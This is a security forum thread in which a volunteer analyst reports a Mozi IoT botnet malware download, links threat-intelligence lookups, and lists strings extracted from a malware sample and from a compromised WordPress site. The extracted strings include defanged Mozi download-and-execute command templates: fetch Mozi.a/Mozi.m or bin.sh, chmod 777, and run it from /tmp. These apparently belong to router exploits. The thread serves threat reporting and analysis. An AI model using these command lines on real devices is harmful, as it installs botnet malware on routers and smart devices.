Only one to report this malware download?

[polonus]

See: https://urlhaus.abuse.ch/url/1212440/
One to report: https://www.virustotal.com/gui/ip-address/101.180.105.163/detection
Now also reported here: https://ip-46.com/101.180.105.163#ip-feeds

Mozi has been designed to specifically to attack low-power smart devices. Once installed, the malware tries to make contact with other infected devices, adding itself to the Mozi botnet. Once registered, the infected device continues toAccording to the report, the Mozi botnet malware targets devices that use MIPS and ARM processors – both of which are very common in low-power smart home hardware. Also infects wireless routers.

DHT node on various addresses: https://www.shodan.io/search?query=101.180.105.163

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

[polonus]

Here the malcode uri's workings are being confirmed through means of working an URL extractor onto it:

-http://%s:%d
-http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
-http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
-http://%s:%d/Mozi.a;sh
-http://%s:%d/Mozi.m
-http://%s:%d/Mozi.m+-O+-
-http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
-http://%s:%d/Mozi.m;/tmp/Mozi.m
-http://%s:%d/bin.sh
-http://%s:%d/bin.sh;chmod
-http://%s:%d/i
-http://%s:%d/i;chmod
-http://127.0.0.1
-http://baidu.com/%s/%s/%d/%s/%s/%s/%s) kicking up a search error
-http://ipinfo.io/ip
-http://purenetworks.com/HNAP1/
-http://schemas.xmlsoap.org/soap/encoding/
-http://schemas.xmlsoap.org/soap/envelope/
-http://schemas.xmlsoap.org/soap/envelope//
-http://www.w3.org/2001/XMLSchema
-http://www.w3.org/2001/XMLSchema-instance

all links blocked by me with - for obvious reasons.

polonus

[polonus]

And some attackers use UPX as a compressor of malware to bypass detection*:

-http://%s?o??:%d/Mo?.m+-O
-http://upx.sf.net  *
GET /-Mo?.m+-O HTTP/1.0
Host: -%s?o??:%d
User-Agent: Malzilla original browser
Referer: -http://%s?o??:%d/Mo?.m+-O
Accept-Encoding: gzip

Normally one should get a 400 Bad Request,

polonus

[polonus]

Here the initial malware has been cleansed apparently:
Reported -> https://urlhaus.abuse.ch/url/1217299/
Scanned for: https://sitecheck.sucuri.net/results/https/salvajeglamping.com/wp-content/js_composer_/include/params/animation_style/HMYopU9fek
Extracted were:

-http://gmpg.org/xfn/11
-https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js
-https://api.w.org/
-https://cdnjs.cloudflare.com/ajax/libs/simple-line-icons/2.4.1/css/simple-line-icons.css
-https://engine.lobbypms.com/salvaje-glamping
-https://fonts.googleapis.com/css?family=Roboto:400
-https://maps.googleapis.com/maps/api/js?key=AIzaSyAox3dhEE18KtzKyecJ4iKBxr_oMosAa1g&language=en
-https://salvajeglamping.com
-https://salvajeglamping.com-content/uploads/2019/09/recargate-de-energia.jpg?id=235)
-https://salvajeglamping.com/
-https://salvajeglamping.com/author/salvaje/
-https://salvajeglamping.com/bioseguridad/
-https://salvajeglamping.com/comments/feed/
-https://salvajeglamping.com/conoce-mas/
-https://salvajeglamping.com/contactenos/
-https://salvajeglamping.com/feed/
-https://salvajeglamping.com/glamping-y-tarifas/
-https://salvajeglamping.com/terminos-y-condiciones/
-https://salvajeglamping.com/ubicacion/
-https://salvajeglamping.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2
-https://salvajeglamping.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3.2
-https://salvajeglamping.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.2.0
-https://salvajeglamping.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=6.2.0
-https://salvajeglamping.com/wp-content/plugins/js_composer/assets/lib/bower/skrollr/dist/skrollr.min.js?ver=6.2.0
-https://salvajeglamping.com/wp-content/plugins/porto-functionality/shortcodes/assets/js/map-loader.min.js?ver=5.6.3
-https://salvajeglamping.com/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.2.15
-https://salvajeglamping.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.2.15
-https://salvajeglamping.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.2.15
-https://salvajeglamping.com/wp-content/themes/porto-child/style.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/bootstrap_1.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/dynamic_style_1.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/ie.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/plugins.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/shortcodes_1.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/skin_1.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/theme.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/js/bootstrap.js?ver=4.7.2
-https://salvajeglamping.com/wp-content/themes/porto/js/html5shiv.min.js
-https://salvajeglamping.com/wp-content/themes/porto/js/plugins.js?ver=4.7.2
-https://salvajeglamping.com/wp-content/themes/porto/js/popper.js?ver=4.7.2
-https://salvajeglamping.com/wp-content/themes/porto/js/respond.min.js
-https://salvajeglamping.com/wp-content/themes/porto/js/theme.js?ver=4.7.2
-https://salvajeglamping.com/wp-content/themes/porto/style.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/uploads/2016/09/pin.png
-https://salvajeglamping.com/wp-content/uploads/2019/10/IMG_9823.jpg
-https://salvajeglamping.com/wp-content/uploads/2019/10/leaves-2.jpg
-https://salvajeglamping.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6.3
-https://salvajeglamping.com/wp-includes/js/comment-reply.min.js?ver=5.6.3
-https://salvajeglamping.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
-https://salvajeglamping.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
-https://salvajeglamping.com/wp-includes/js/wp-embed.min.js?ver=5.6.3
-https://salvajeglamping.com/wp-includes/wlwmanifest.xml
-https://salvajeglamping.com/wp-json/
-https://salvajeglamping.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsalvajeglamping.com%2F
-https://salvajeglamping.com/wp-json/oembed/1.0/embed?url
-https%3A%2F%2Fsalvajeglamping.com%2F&format=xml
-https://salvajeglamping.com/wp-json/wp/v2/pages/143
-https://salvajeglamping.com/wp/conoce-mas/
-https://salvajeglamping.com/wp/wp-content/uploads/2019/10/logo-salvaje-white.png
-https://salvajeglamping.com/xmlrpc.php
-https://salvajeglamping.com/xmlrpc.php?rsd
-https://wa.me/3006382616
-https://wa.me/3012159543
-https://www.facebook.com/SalvajeGlamping/
-https://www.instagram.com/salvajeglamping/
-https://youtu.be/DnoFXMfAyGI

polonus